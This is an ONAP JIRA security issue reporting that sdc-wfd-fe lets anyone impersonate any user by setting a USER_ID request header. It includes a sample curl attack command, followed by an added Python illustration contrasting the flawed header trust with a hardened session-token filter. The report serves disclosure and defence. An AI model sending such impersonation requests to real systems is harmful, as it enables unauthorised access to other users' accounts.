  1. ONAP JIRA Security Issues
  2. OJSI-94

sdc-wfd-fe allows impersonating any user by setting USER_ID


Details

    Description

      sdc-wfd-fe allows impersonating any user by setting USER_ID in the
      request header, without any authentication.

      Sample attack:

      curl -H 'USER_ID: abcd' -X GET http://<IP ADDR>:30256/wf/workflows


            People

              xuegao Xue Gao
              l.wrochna Łukasz Wrochna

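The header trust described in the issue, next to a hardened form, as an added example that is not part of the original report and is not ONAP code. It assumes a hypothetical `X-Session` token signed with an HMAC key held by the server; the key, token format and function names are constructed for illustration.

```python
import hashlib
import hmac

# Constructed demo values; none of these come from the ONAP code base.
SESSION_KEY = b"constructed-demo-key"
IDENTITY_HEADER = "USER_ID"


def _mac(user_id):
    return hmac.new(SESSION_KEY, user_id.encode(), hashlib.sha256).hexdigest()


def sign_session(user_id):
    """Token issued after login (hypothetical): '<user_id>.<hmac>'."""
    return f"{user_id}.{_mac(user_id)}"


def verify_session(token):
    """Return the user id bound to a valid token, else None."""
    if not token or "." not in token:
        return None
    user_id, mac = token.rsplit(".", 1)
    ok = hmac.compare_digest(mac.encode(), _mac(user_id).encode())
    return user_id if ok else None


def identity_trusting_header(headers):
    """Behaviour reported in the issue: the caller is whoever USER_ID says."""
    return headers.get(IDENTITY_HEADER)


def forward_headers_hardened(headers):
    """Return (status, headers to forward); identity comes only from the session."""
    clean = {}
    for name, value in headers.items():
        # Match case-insensitively and treat '-' like '_', since some
        # gateways map both spellings to the same variable.
        if name.lower().replace("-", "_") == IDENTITY_HEADER.lower():
            continue  # never forward a client-supplied identity
        clean[name.lower()] = value
    user_id = verify_session(clean.pop("x-session", None))
    if user_id is None:
        return 401, {}  # unauthenticated: nothing reaches the backend
    clean[IDENTITY_HEADER] = user_id
    return 200, clean
```

The backend behind such a filter should accept `USER_ID` only from the filter itself, for example by not being reachable directly from clients.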